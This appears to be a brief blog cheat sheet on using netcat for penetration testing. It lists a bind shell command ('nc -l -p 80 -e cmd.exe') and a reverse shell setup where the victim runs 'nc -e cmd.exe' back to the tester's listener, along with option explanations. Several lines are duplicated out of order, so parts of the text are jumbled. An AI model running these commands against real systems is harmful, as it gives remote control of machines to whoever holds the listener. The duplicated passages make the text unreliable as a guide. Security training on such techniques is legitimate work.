Victim : nc -l -p Port -e Program to be executed
ex). nc -l -p 80 -e cmd.exe
option -l : Listen mode, for inbound connects.
-p : Specify local port for remote connects.
-e : -e spawns the executable with its input and output
-p : Specify local port for remote connects.
-e : -e spawns the executable with its input and output
redirected via network socket.
Penetration tester : nc ip_address port
ex). nc 192.168.0.4 80
2. Use reverse telnet.
Penetration tester : nc -l Port -v
ex). nc -l 7777 -v
Penetration tester : nc ip_address port
ex). nc 192.168.0.4 80
2. Use reverse telnet.
Penetration tester : nc -l Port -v
ex). nc -l 7777 -v
option -l : Listen mode, for inbound connects.
-v : Have nc give more verbose output.
Victim : nc -e Program to be executed ip_address Port
ex).nc -e cmd.exe 192.168.0.3 7777
option -e : -e spawns the executable with its input and output
댓글 없음:
댓글 쓰기